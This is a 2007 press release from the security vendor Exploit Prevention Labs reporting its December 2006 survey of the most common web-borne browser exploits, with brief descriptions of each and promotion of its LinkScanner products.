Press Releases
EXPLOIT PREVENTION LABS RELEASES DECEMBER EXPLOIT PREVALENCE SURVEY
“Q406 Roll-up” Exploit Package Dominates with 70.9 Percent of all Occurrences
January 23, 2007 – Atlanta, GA – Exploit Prevention Labs (http://www.explabs.com), a leading developer of safe surfing software that protects against phishing, social engineering and other web-based exploits, today released the results of its December 2006 Exploit Prevalence Survey™. Now in its eighth month, the Exploit Prevalence Survey is the industry’s only survey to use real-world data to definitively measure the most widespread web-borne exploits. Results are derived from automated reports submitted by users of Exploit Prevention Labs’ LinkScanner family of safe surfing applications, combined with data collected from all levels of the company’s multi-faceted research network.
Roger Thompson, CTO of Exploit Prevention Labs and author of the monthly Exploit Prevalence Survey, noted increased activity among cybercriminals in December. Thompson has dubbed this month’s most common package, accounting for more than 70% of all reports, the “Q406 Roll-up” package, as it consists largely of updated versions of exploits issued during the fourth quarter of 2006.
“The dominance of this package reinforces the fact that the development and release of exploits frequently parallels legitimate software businesses,” noted Thompson. “The bad guys are working hard to update and release tweaks to existing exploits at least in part because developing a new exploit is a complex development task.”
According to Thompson, the most common exploits in the package are Setslice, VML and XML, all of which were derived from proof-of-concepts released by HD Moore during his Month of Browser Bugs in September 2006. “The entire package is heavily encrypted, but it appears there are around a dozen individual exploits included.”
Also included in the package is the IE Com CreateObject exploit, originally released as a proof of concept in August, and which occupied November’s number one ranking with 30.45 per cent of all occurrences.
In a surprising twist, WebAttacker disappeared from the list completely after ranking number two in the November survey. “The bad guys have never really been successful with WebAttacker,” Thompson explained. “Their tweaks never quite worked. Most of the time, the variants were buggy and just shut down the browsers without infecting the PC.”
But Thompson believes the bad guys are not rolling over and admitting defeat. “Unlike previous generations of virus authors who wrote malware for sadistic thrills and bragging rights, today’s exploit authors are doing it for profit,” he reiterated. “With Windows Vista coming and the rapid take-up of Web 2.0 applications, cybercriminals will continue to develop new malicious exploits and users will need to continue to patch assiduously, as well as use exploit-specific protection like LinkScanner.”
Exploit Prevalence Results for the Month of December 2006
The following is a summary of the top five most-reported web exploits for December 2006:
Exploit |
Rank last month |
Percent of Overall Occurrences |
Description |
Q406 Roll-up package |
New |
70.90 percent (new) |
Comprised of up to a dozen exploits, the most common are setSlice, VML, XML, and (IE COM) Createcomobject Code. The package is usually heavily encrypted making it difficult to single out individual exploits. |
MDAC |
6 |
5.70 percent (4.50 previous) |
Although technically not an exploit, MDAC refers to a creative method of using certain ActiveX controls in a context for which Microsoft did not originally intend them to be used. They instantiate an ActiveX control inside a web script that allows files to be written to the disk and executed. |
IE Com CreateObject |
1 |
4.50 percent (30.21 previous) |
IE Com CreateObject was originally released in August as a proof of concept. The exploit creates a COM object in a mode that was never anticipated by Microsoft, and although it was intended for some useful purposes, the functions it enables are potentially dangerous in the hands of a cyber criminal such as saving files to the disk, or executing a file on the disk. |
Iframers launcher script |
5 |
3.60 percent (6.26 previous) |
Propagated by a cybercrime organization sometimes called the CoolWebSearch gang, or the Russian iframers, this exploit is perpetrated by a cybercrime mob generally thought to be based in St. Petersburg, Russia. This organization is responsible for the Circuit City hack in early June 2006. Using a simple HTML tag called an iframe embedded on a hacked web site, the visitor’s web browser is redirected to an exploit server operated by the gang, which attempts to deposit up to eight different exploits onto the user’s computer. |
WMF (CVE-2005-2124) with known payload |
4 |
2.70 percent (7.20 previous) |
Windows Metafile exploit from December 2005. Uses a little-known feature of Windows Metafiles to execute arbitrary code, including malware. The exploit, a genuine zero-day attack, was allegedly purchased for $5,000 from a Russian hacking group. Seven months after Microsoft issued a patch, it’s still widely used by cybercriminals. |
Note: Numbers above do not add up to 100 percent, due to the following lesser reported exploits: webattacker (2.30% vs. 23.33) WMF with unknown payload (1.40%), quicktime href worm (1.20% new) IE VML overflow (1.20% vs. 4.0%), others (3.80 %) |
Note to media: Members of the media who would like to interview Roger Thompson about this survey may contact Tim Shisler of Dovetail Public Relations at 408-395-3600 or at xpl (at) dovetailpr (dot) com.
For additional background information on exploits and how to protect against them, visit Exploit Prevention Lab’s comprehensive Resource Center at http://www.explabs.com/about/resCenter/.
About the LinkScanner Family of Safe Surfing Software
Exploit Prevention Labs provides a complete family of safe surfing software to protect Internet users against malicious web sites, phishing, social engineering and other web-based exploits.
The LinkScanner family of safe surfing products include LinkScanner Pro™, LinkScanner Lite™, and LinkScanner Online. LinkScanner Pro™ (free 30-day evaluation: http://www.explabs.com/downloads/LSP), a $29.95 safe surfing Windows application, provides real-time, automatic protection against malicious web sites, drive-by downloads and other crimeware exploits.
LinkScanner Lite (http://www.explabs.com/downloads/LSL) is a free application that provides Internet Explorer users with real-time scanning of Google, MSN and Yahoo search results for web-based threats, as well as on-demand scanning of individual links. Support for Firefox and other browsers and search engines is in development.
LinkScanner Online, available at http://linkscanner.explabs.com, is a free real-time online URL scanning service that lets users know whether any individual site they intend to visit has been poisoned by an exploit distribution network. LinkScanner Online supports all major web browsers and is freely available for incorporation into third-party websites. Interested webmasters can request the code through Exploit Prevention Labs’ website at http://www.explabs.com/LinkScanner/MyLinkScanner/.
About Exploit Prevention Labs
Founded by information security veterans Bob Bales and Roger Thompson in 2005, Exploit Prevention Labs develops the LinkScanner family of safe surfing software and services. LinkScanner Pro, LinkScanner Lite and LinkScanner Online provide patent-pending protection against malicious web sites and web-based exploits during the critical risk window between the announcement of a security vulnerability and the provision of a patch by the vendor. A Software Development Kit (SDK) is also available to enable third party vendors to incorporate Exploit Prevention Labs’ technology in their own applications and services. More information about Exploit Prevention Labs and LinkScanner may be found on the company’s website at http://www.explabs.com.
###
Media Contact:
Tim Shisler/Julie Parayno
Dovetail Public Relations
408.395.3600
xpl at dovetailpr.com
|
